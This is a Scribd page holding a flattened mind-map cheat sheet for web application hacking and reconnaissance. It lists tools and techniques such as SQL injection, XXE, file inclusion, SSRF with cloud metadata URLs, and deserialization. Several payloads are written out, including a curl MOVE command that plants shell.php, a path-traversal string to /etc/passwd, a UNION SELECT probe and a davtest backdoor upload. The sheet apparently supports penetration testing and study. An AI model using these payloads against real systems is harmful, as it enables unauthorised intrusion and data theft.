Location via proxy:   [ UP ]  
[Report a bug]   [Manage cookies]                
Scribd Logo
Upload

Welcome to Scribd!

  • 130 views

    Web Hacking and Recon

    Uploaded by

    Crazy Jack
    This document provides links to tools and resources for web hacking, including CyberChef for encoding/decoding data, DE4JS for analyzing JavaScript, and XCAT for exploring Linux systems. It also outlines techniques for reconnaissance, content discovery, identifying web technologies, subdomain enumeration, exploiting HTTP verbs and headers, and converting between XML and JSON formats. The overall focus is on methodologies for attacking and assessing security of web applications and servers.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd

    Web Hacking and Recon

    Uploaded by

    Crazy Jack
    130 views2 pages
    This document provides links to tools and resources for web hacking, including CyberChef for encoding/decoding data, DE4JS for analyzing JavaScript, and XCAT for exploring Linux systems. It also outlines techniques for reconnaissance, content discovery, identifying web technologies, subdomain enumeration, exploiting HTTP verbs and headers, and converting between XML and JSON formats. The overall focus is on methodologies for attacking and assessing security of web applications and servers.

    Original Title

    WEB HACKING AND RECON

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    This document provides links to tools and resources for web hacking, including CyberChef for encoding/decoding data, DE4JS for analyzing JavaScript, and XCAT for exploring Linux systems. It also outlines techniques for reconnaissance, content discovery, identifying web technologies, subdomain enumeration, exploiting HTTP verbs and headers, and converting between XML and JSON formats. The overall focus is on methodologies for attacking and assessing security of web applications and servers.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Download as pdf or txt
    130 views2 pages

    Web Hacking and Recon

    Uploaded by

    Crazy Jack
    This document provides links to tools and resources for web hacking, including CyberChef for encoding/decoding data, DE4JS for analyzing JavaScript, and XCAT for exploring Linux systems. It also outlines techniques for reconnaissance, content discovery, identifying web technologies, subdomain enumeration, exploiting HTTP verbs and headers, and converting between XML and JSON formats. The overall focus is on methodologies for attacking and assessing security of web applications and servers.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Download as pdf or txt
    You are on page 1of 2

    https://gchq.github.

    io/CyberChef/ 

    https://lelinhtinh.github.io/de4js/ 

    https://xcat.readthedocs.io/en/latest/ 

    https://github.com/detectify/page-fetch 

    OXML_XXE (https://github.com/BuffaloWill/
    oxml_xxe)

    https://github.com/swisskyrepo/
    PayloadsAllTheThings

    wpscan 

    https://book.hacktricks.xyz 
    Cheat Sheets Tools Droopescan 

    https://maxtoroq.github.io/xpath-ref/  WEB HACKING CMSmap 

    https://0xsp.com/  CMSeeK 

    Reconnaissance WPXF 

    Content Discovery joomscan 

    JoomlaVS 

    Identify Web technology Drupwn 

    https://github.com/wireghoul/htshells 

    Wappalyzer

    Common filetypes

    html

    php

    aspx

    txt

    js

    feroxbuster / gobuster

    Review JavaScript Files

    https://lelinhtinh.github.io/de4js/

    Review HTML code

    Spiders

    gospider

    Identify directory and filename patterns

    Read metadata of files (PDF/Images) to


    identify Author, E-mails, Software used

    Subdomain Enumeration

    SSL

    Google Dorks

    Bruteforce

    gobuster dns

    ffuf -H "Host: FUZZ.domain.com"

    amass

    HTTP VERBS

    OPTIONS

    GET

    POST

    PUT

    DELETE

    curl -X MOVE --header 'Destination:http://$


    MOVE
    ip/shell.php' 'http://$ip/shell.txt'

    PATCH

    INSERT (ARBITRARY VALUE) Setting arbitrary HTTP verb


    might force the Web Server
    HELP to disclose information.

    Change Request Method

    Provide parameters in GET

    Change Content-Type

    JSON => XML

    https://codebeautify.org/xmltojson

    https://www.oxygenxml.com/xml_json_
    converter.html

    HTTP Headers

    Common Headers

    X-Requested-For

    X-Real-IP

    X-Forwarded-Host

    X-Client-IP

    X-Forwarded-By

    X-Remote-Addr

    X-Remote-IP

    X-Wap-Profile: <URL-to-XML-file>

    Custom Headers

    BurpCollaboratorEverywhere (SSRF)

    Differrent User-Agent

    Windows

    Linux

    Android

    Custom Value (injection?)

    Duplicate Host Header

    Some implementations might be parsing


    HTTP Headers like "User-Agent" in an
    insecure manner

    Command Injection

    Shellshock

    SSRF

    BurpCollaboratorEverywhere

    SQLi

    Origin overwrite

    HTTP Parameters

    ParamMiner

    HTTP Parameter Pollution

    id=1&id=2

    Password Reset

    User Enumeration

    Missing Rate Limiting

    Password Reset Poisoning via Host Header


    Injection

    Re-usable Password Reset Token

    No Expiration on Password Reset Token

    Guessable Password Reset Token

    IDN Homograph Attack

    Weak Password Policy

    Information Disclosure

    Generate an error

    Special characters

    HTTP Parameters

    Change type to array ( ?id= to ?id[]= )

    Missing parameters

    Parameter Pollution

    Non existing page => 404

    Very long session/cookies

    HTML code review

    JS code review

    Search for ".map" files

    https://lelinhtinh.github.io/de4js/

    Path Traversal

    NGINX

    nginx.conf

    location /path misconfiguration

    vulnerable.site/path..%2f..%2f..%2f..%
    2fetc%2fpasswd

    Filter Bypass

    Unicode

    Codepoints: &#32;

    URL Encoding: %2e%2e%2f

    Web Servers

    Apache

    /etc/apache2/apache2.conf

    /etc/apache2/envvars

    /etc/apache2/sites-enabled/000-default.
    conf

    /var/log/apache2/error.log

    NGINX

    /etc/nginx/nginx.conf

    /etc/nginx/locations.conf

    /etc/nginx/server.conf

    /etc/nginx/sites-enabled/default

    NodeJS

    var http = require('http');

    LDAP Injection

    XPATH Injection

    https://xcat.readthedocs.io/en/latest/ 

    https://maxtoroq.github.io/xpath-ref/ 

    OS Command Injection

    SQL Injection

    Identify number of columns

    UNION SELECT NULL, NULL, NULL, NULL; -- -

    Identify columns data types and which


    columns are visible

    Identify Database type (MySQL,


    PostgreSQL, ...) and version

    sqlmap

    NOSQL Injection

    XML eXternal Entities (XXE)

    OOB (Out of Band)

    xxe.sh

    OXML_XXE (https://github.com/BuffaloWill/
    oxml_xxe)

    OOXML (DOCX, XLSX, PPTX), ODF, PDF, RSS

    File Inclusion (LFI/RFI)

    Wrappers

    phar://
    Access archives
    zlib://

    file://

    ogg://

    expect://

    glob:// File pattern matching

    data://

    php://

    php://filter/convert.base64-encode/
    resource=

    Log Poisoning

    Session Poisoning

    Interesting Files

    Race Conditions (TOCTOU)

    Template Injection (SSTI)

    Python

    Jinja2

    PHP

    Twig

    Server Side Request Forgery (


    SSRF)

    gopher:// URL Scheme

    Filter Bypass

    127.0.0.1.nip.io

    localhost == [::]

    decimal notation 127.0.0.1 == 2130706433

    IPv6/IPv4 Embedding [0:0:0:0:0:ffff:127.0.0.


    1]

    Cloud

    AWS http://169.254.169.254/latest/meta-
    data

    Alibaba http://100.100.100.200/latest/meta-
    data/

    Oracle Cloud http://192.0.0.192/latest/meta-


    data/

    Digital Ocean http://169.254.169.254/


    metadata/v1.json

    Request Smuggling

    Smuggler

    Insecure Deserialization

    Check all user controlled input

    Cookies / Sessions
    The application would need to deserialize
    untrusted user input
    HTTP Parameters

    HTTP Headers

    Remote Method Invocation (RMI)

    Python

    Pickle

    PyYAML load

    Java

    Magic Numbers "AC ED 00 05"

    Java-Deserialization-Cheat-Sheet

    ysoserial

    XMLDecoder

    XStream->fromXML

    ObjectInputStream

    ObjectInputStream->readExternal

    ObjectInputStream->readResolve

    ObjectInputStream->readObject

    ObjectInputStream->readUnshared

    Content-Type: application/x-java-serialized-
    object

    Ruby

    unmarshal

    PHP

    unserialize

    phpggc

    Cross Site Scripting (XSS)

    Same Origin Policy (SOP)

    Cross Origin Resource Sharing (CORS)

    Check for Request Splitting

    Add CORS related HTTP Header to allow


    XSS

    File Upload

    WebDAV

    cadaver

    davtest [-auth user:password] -move -


    davtest
    sendbd auto -url http://<IP>

    curl -T file.txt http://<IP>

    curl -X MOVE --header 'Destination:http://$


    HTTP MOVE
    ip/shell.php' 'http://$ip/shell.txt'

    web.config (ASP.NET)

    Make specific file extensions executable (e.


    g: execute txt files)

    https://soroush.secproject.com/blog/2014/
    07/upload-a-web-config-file-for-fun-profit/

    .htaccess (Apache)

    Make specific file extensions executable (e.


    g: execute txt files)

    https://github.com/wireghoul/htshells 

    Content-Type filter bypass

    Magic Bytes filter bypass

    Double Extensions filter bypass

    Alternative extensions blacklist filter bypass

    Prototype Pollution

    https://github.com/detectify/page-fetch 

    Content Management Systems (


    CMS)

    Wordpress

    wpscan 

    Droopescan 

    CMSmap 

    CMSeeK 

    WPXF 

    Joomla

    joomscan 

    Droopescan 

    CMSmap 

    CMSeeK 

    JoomlaVS 

    Drupal

    Droopescan 

    CMSmap 

    Drupwn 

    CMSeeK 

    You might also like